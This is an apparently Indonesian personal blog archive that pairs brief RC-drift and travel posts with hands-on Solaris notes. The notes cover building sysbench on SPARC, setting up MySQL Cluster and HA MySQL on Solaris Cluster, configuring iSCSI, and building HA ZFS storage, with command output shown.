Delicious

Archives

Categories

Archive for 'Aktifitas' Category





« »

Nyasar Surabaya *lagi

  ozzie / 02/01/2014

Surabaya, 27-des-2013 – 2 jan-2014



nyasar Balikpapan

  ozzie / 16/12/2013

Balikpapan



RCDI Final 2013

  ozzie / 08/12/2013


Seasons City Mall – 8 dec 2013



Sarinah Never Sleeps 2013

  ozzie / 07/12/2013

RC Drift Fun Race Magelang

  ozzie / 13/11/2013





Bekasi, Semarang, Magelang, Cirebon; 8 – 11 November 2013



Drift lagi…

  ozzie / 21/10/2013

new experience

  ozzie / 14/10/2013

ozzienich

MGK kemayoran, 13-Oct-2013



RC Drift

  ozzie / 11/10/2013

Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

sedikit dokumentasi dari kebanyakan yg gagal install SYSBENCH di Solaris khususnya pada architecture SPARC :D

dengan menu dasar:

 
1. make sure solaris studio sudah siap

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update path binary executable

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install

 
6. extract, build & install sysbench
edit file configure.ac

# cd sysbench-0.4.12
# vi configure.ac



edit menjadi AC_PROG_RANLIB

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



Menjadi

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
mari mem-Benchmark OLTP MySQL Enterprise. <:-p <:-p
bagaimana hasilnya?? :>



RC Drift

  ozzie / 11/09/2013

Bermain & Belajar.. agar tidak menjadi SAMPAH penakut yg menambah macet jakarta



Safety can be Fun

  ozzie / 06/09/2013

Nyasar Surabaya

  ozzie / 05/09/2013

[Surabaya] kelayapan bingung Hotel Majapahit(Ex. Hotel Yamato / Hotel Oranje)
http://id.wikipedia.org/wiki/Insiden_Hotel_Yamato



Make Work into Play – Make Play into Work

Jatiluhur Purwakarta – >>>



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: nDB, Sql, Management
node2 [10.0.5.42]: nDB, Sql
node3 [10.0.5.43]: nDB, Sql


berhubung cuman develop, struktur direcrory config & datadir nyah ditaruh di /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini –configdir=/apps/config/ –initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

exec @ node1: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

cek pada cluster management:

2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
indb_mgm>

Execute pada semua Node:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
tinggal configure privileges & create database dengan engine ndbcluster



Removing a Node From a Resource Group
how to ngebuang node (monyet3) dari resource group aktif..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrg status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2

dari node yang aktif:

# clnode evacuate monyet3

shutdown monyet3 dan booting non cluster mode

ok boot -x

bersambung….



Solaris comstar – iSCSI

  ozzie / 02/07/2013
# pkg install group/feature/storage-server
           Packages to install:  47
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   3
 
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk0
Logical unit created: 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk1
Logical unit created: 600144F000144FFB295351DFFBB80002
 
 
 
root@iSCSI-ZFS1:~# stmfadm list-lu -v
LU Name: 600144F000144FFB295351DFFBB20001
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk0
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk0
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
LU Name: 600144F000144FFB295351DFFBB80002
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk1
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk1
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

build MySQL HA enterprise pada Solaris Cluster kandang-monyet & kandang-buaya…
karena Data Service MySQL belum include pada Solaris Cluster.. jadi registrasi manual..

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

register Generic Data Service

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create resource group dan logical hostname untuk Failover

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG

Register Manual:
setting parameter sesuai konfigurasi & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

register Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

tinggal switch antar node dah #:-s

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shutdown semua node.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Berhubung mesin SPARC tinggal tambah option di OKpromt..

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

tinggal execute clsetup

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

tinggal reboot dan taadddaaaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

simulasi High-Availability Storage dengan 3 node Solaris Cluster dan iSCSI dengan Solaris 11 & Solaris Cluster 4.1.


setelah Solaris Cluster sudah up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & Network service

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create Resource Group dari group Monyet

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create ZFS pool isi pelem – ‘poolBOKEP’ – sebelom tambah ke resource cluster

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



tambah ‘poolBOKEP’ sebagai resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p  Zpools=poolBOKEP  -p \ ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import poolBokep tadi:

root@Monyet1:~#  zpool import poolBOKEP

tambah Virtual IP resource untuk resource group RG-MONYET :

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
